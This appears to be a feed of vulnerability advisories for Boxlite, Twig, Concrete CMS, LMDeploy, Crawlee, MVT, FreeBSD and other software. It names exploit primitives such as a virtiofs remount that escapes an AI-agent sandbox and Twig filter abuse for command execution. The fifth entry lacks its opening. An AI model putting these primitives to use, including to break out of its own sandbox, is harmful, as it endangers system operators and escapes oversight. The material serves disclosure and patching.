Sandbox escape in Boxlite versions prior to 0.9.0 lets untrusted code running inside the lightweight VM remount host-shared virtiofs directories from read-only to read-write, enabling arbitrary writes to host files that operators believed were protected. Because the container is granted all 41 Linux capabilities (including CAP_SYS_ADMIN), a trivial 'mount -o remount,rw' bypasses the client-side MS_RDONLY enforcement, and in AI-agent deployments this leads to host code execution by tampering with mounted code, virtualenvs, or credentials. Publicly available exploit code exists (working PoC published in the GHSA advisory) and the issue carries a CVSS 10.0 with scope change; no public exploit identified at time of analysis in CISA KEV.

Arbitrary PHP code execution in Twig templating engine versions 3.15.0 through 3.25.x allows attackers who control template source to inject raw PHP into the compiled template via the `_self.(<string>)` dynamic-attribute macro-reference path, fully bypassing the SandboxExtension. The flaw executes injected code at template-load time, before any SecurityPolicy check runs, rendering even a globally-enabled empty allowlist sandbox ineffective. No public exploit identified at time of analysis, but the vendor advisory describes the bypass mechanism in enough detail that PoC development is straightforward.

Unauthenticated arbitrary file upload in the BookingPress Pro WordPress plugin (versions ≤5.6) enables remote code execution by abusing missing file type validation in the bookingpress_validate_submitted_booking_form_func function. Exploitation requires the booking form to include a signature custom field, but otherwise needs no authentication or user interaction. No public exploit identified at time of analysis, though Wordfence's disclosure and the CWE-434 pattern make weaponization straightforward.

Sandbox escape in Twig 3.9.0-3.25.x allows any attacker with template authoring access to fully bypass `SourcePolicyInterface`-driven security policies, enabling OS command execution via `|map("system")` and secret disclosure via `constant()`. The bypass occurs because `Environment::createTemplate()` compiles inline strings under a synthesized name (`__string_template__<hash>`) that name/path-based `SourcePolicy` implementations do not recognize, causing `checkSecurity()` to silently become a no-op on the inner template. No public exploit has been identified at time of analysis, though the vendor advisory provides sufficient technical detail for reproduction, and the RCE tag confirms the potential impact is critical for affected configurations.

{% use %}` tags to break out of compiled cache file string literals and execute arbitrary PHP code. The flaw bypasses the Twig sandbox entirely because `SecurityPolicy` unconditionally permits `{% use %}` regardless of `allowedTags` configuration. No public exploit identified at time of analysis, but the GitHub Security Advisory (GHSA-7p85-w9px-jpjp) discloses the full exploitation primitive.

Remote code execution in Concrete CMS 9.5.0 and earlier is achievable through a CSRF flaw in the /dashboard/extend/update/prepare_remote_upgrade/<remoteMPID> endpoint, which fails to validate anti-CSRF tokens. An attacker who controls a marketplace package matching an item ID already installed on the victim site can overwrite package PHP files and trigger the upgrade() method via a single navigation by a privileged admin, resulting in code execution as the web server user. No public exploit identified at time of analysis, though the vendor (Concrete CMS security team) has acknowledged and rated the issue at CVSS 4.0 7.5.

Cross-site request forgery in Concrete CMS 9.5.0 and earlier allows remote attackers to coerce an authenticated administrator with canInstallPackages permission into installing an attacker-controlled package, resulting in remote code execution as the web server user. The flaw resides in the install_package() method of the dashboard's extend/install.php controller, which lacks CSRF token validation. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

Denial-of-service via unchecked memory allocation in russh (Rust SSH library) versions <= 0.60.2 allows local SSH agent peers to trigger uncontrolled buffer growth by sending oversized frame length values, and in pre-0.58.0 releases the same CryptoVec allocation path was reachable from remote SSH transport and zlib decompression buffers. The flaw stems from CryptoVec performing unchecked capacity growth, unchecked length arithmetic, and unsafe allocation/locking calls including NonNull::new_unchecked on potentially failed allocations, which can abort the process under memory pressure. Publicly available exploit code exists in the form of researcher-supplied PoC tests demonstrating both rejection on patched code and crash behavior on historical versions; no public exploit identified at time of analysis for active campaigns and the issue is not listed in CISA KEV.

Arbitrary command execution in Fission's builder component (pkg:go/github.com/fission/fission <= 1.22.0) allows any principal with create or update privileges on Environment CRDs to redirect the builder pod to execute any binary reachable via $PATH inside the builder image. The vulnerable call site at pkg/builder/builder.go:254 passes the unsanitized Environment.spec.builder.command value directly to exec.Command after a strings.Fields split, enabling attackers to specify paths such as /bin/sh -c '...' as the build command. No public exploit has been identified at time of analysis, but the patch is confirmed released in v1.23.0 and the exploit primitive requires only a single Kubernetes API write to trigger.

Remote code execution in Concrete CMS versions 5.0 through 9.5.0 allows a high-privileged administrator to bypass the platform's `_fromCIF` deserialization guard by submitting malicious payloads through the REST API instead of standard form POST requests. The flaw resides in the ExpressEntryList block controller (CWE-502) and stores a serialized PHP gadget in the `filterFields` database column, which is unmarshalled when another administrator subsequently views or edits the block, leading to full server takeover. No public exploit identified at time of analysis, and the issue is not present in CISA KEV.

Authenticated remote code execution in Concrete CMS 9.5.0 and earlier allows an administrator with composer form editing privileges to chain a path traversal flaw in the ptComposerFormLayoutSetControlCustomTemplate field with the platform's permissive file uploader to execute arbitrary PHP on the server. The vendor scored this 9.4 (CVSS v4.0) reflecting high confidentiality, integrity, and availability impact across both the vulnerable component and downstream subsequent systems. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Unsafe default code execution in InternLM LMDeploy (<=0.12.3) lets a malicious Hugging Face model repository run arbitrary Python on the host whenever a user loads it through any LMDeploy CLI (serve, calibrate, gptq, awq). The library hardcodes transformers.AutoConfig.from_pretrained(..., trust_remote_code=True) in get_model_arch and related helpers with no flag, env var, or warning to opt out, overriding HF Transformers' default-secure stance. No public exploit identified at time of analysis, and exploitation requires the user to load an untrusted repo, so risk is hardening-level rather than network-reachable RCE.

Two-layer blind SSRF in Crawlee for Python (pip/crawlee >= 1.0.0, < 1.7.0) allows an attacker who controls a sitemap or robots.txt file to force the crawler to issue HTTP requests against internal network services (layer 1, all HTTP clients), and - when CurlImpersonateHttpClient is configured - to dispatch non-HTTP scheme requests including gopher://, file://, dict://, and ftp:// (layer 2). The layer 2 escalation enables canonical Redis exploitation via gopher://, making RCE on unauthenticated internal Redis instances achievable from a public-facing crawler. No public exploit code has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog, but the researcher-credited advisory details a fully articulated attack path including Redis RCE.

Arbitrary code execution in InternLM lmdeploy <= 0.12.3 occurs because trust_remote_code=True is hardcoded across HuggingFace model-loading call sites in lmdeploy/archs.py and lmdeploy/utils.py. An attacker who can influence the model_path passed to an lmdeploy serving process can point it at a malicious HuggingFace repository, causing Transformers to download and execute attacker-controlled Python code with the privileges of the serving daemon. Publicly available exploit code exists in the GHSA advisory, and an upstream fix has been merged via PR #4511 (fixed in 0.13.0).

Path traversal in Mobile Verification Toolkit (MVT) pip/mvt versions through 2026.4.28 allows an adversary who delivers a crafted iOS backup to trigger arbitrary file writes or reads on the analyst's filesystem by embedding directory traversal sequences in fileID values within the backup's Manifest.db SQLite database. The decrypt-backup command can write attacker-controlled content to arbitrary writable paths - enabling shell profile modification or SSH key injection for code execution - while check-backup can read arbitrary host files into MVT's JSON and CSV forensic output. No public exploit has been identified at time of analysis; vendor-released patch v2026.5.12 is available.

Authenticated remote code execution affects Zoho ManageEngine ADSelfService Plus (before build 6525), DataSecurity Plus (before 6264), and RecoveryManager Plus (before 6313) on agent machines, stemming from a flaw in a bundled third-party dependency. An authenticated attacker with low privileges can inject commands (CWE-77) to execute arbitrary code on managed agent endpoints, with no public exploit identified at time of analysis.

Catalog zone transfer failure in PowerDNS Authoritative can be triggered by a high-privileged remote attacker who injects insufficiently validated member zone data, causing the catalog zone transfer mechanism to abort and preventing secondary nameservers from receiving zone updates. The impact is a targeted denial-of-service against DNS zone replication infrastructure, affecting any deployment using catalog zones (RFC 9432). No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.

Local privilege escalation in FreeBSD via the ptrace(PT_SC_REMOTE) interface allows an unprivileged user with debug access to a process to trigger arbitrary kernel code execution by abusing improperly validated parameters in syscall(2) and __syscall(2) meta-system calls. Affected releases include FreeBSD 14.3, 14.4, and 15.0 prior to their respective patch levels, and no public exploit identified at time of analysis. EPSS exploitation probability is low (0.02%) but the CVSS base score of 8.4 reflects high impact across confidentiality, integrity, and availability once a foothold exists.